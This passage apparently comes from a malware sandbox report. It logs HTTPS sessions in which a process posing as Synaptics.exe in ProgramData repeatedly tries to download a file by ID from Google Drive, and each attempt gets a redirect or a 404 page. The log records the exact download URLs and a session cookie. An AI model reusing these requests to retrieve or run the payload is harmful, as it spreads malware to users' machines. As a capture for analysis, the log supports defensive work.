                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-7No2Pp5xV6GvvHl1mJ6E8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 50086 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:49 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:51 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC41UYyn26Lm1ZDVFJp-pOcvAy7sTxN0DW3XWyJQWVFCXduairEXYKECj7j5Rcl2atpCbozCrr0
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:50 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gYiaHXXfDRklIN--AgVPYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:51 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-25 08:08:51 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="GYUJIYQueD9zO_HS00rCeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-25 08:08:51 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 50104 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:53 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:53 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3UrmKGaatqnFv8YX-Odumg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 50105 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:53 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:53 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SdZp76wx6hpuHY4cGcA53g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 50115 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:55 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:56 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6kNIlWYuOmH-ZCoFzgG9Nfq3M8yaCOsl9KxyRziScypP-sdgJZA_pO8QWG2r5eebemE09wKuo
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SxSJcccvBBdaMxUzMPw-fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:56 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-25 08:08:56 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="KNo7LbmJ0SuhQ9fPa9R6og">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:56 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 50116 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:55 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-FDeiD_WfDfaZyqGwA3hYwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 50117 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:55 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:56 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6k15TExYxAAz5b6FPdRy3MLZSvIkscNz90wl_eCY6vjUNifMflN6K4jOEL6w-fY8Gc
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jCw2YMIf9q4Mv9tI9t0CrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:56 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-25 08:08:56 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="N4dRk1D_47M5vb96-FsIcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-25 08:08:56 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 50118 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:55 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:56 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-LdOvF3yUVi2eci1owtomqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 50130 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:58 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:59 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-erZK-jGWjQvdIGWbePu3Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 50129 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:58 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:59 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-kxsfRqoGY-Fn2Ko13a0f0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 50145 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:09:01 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
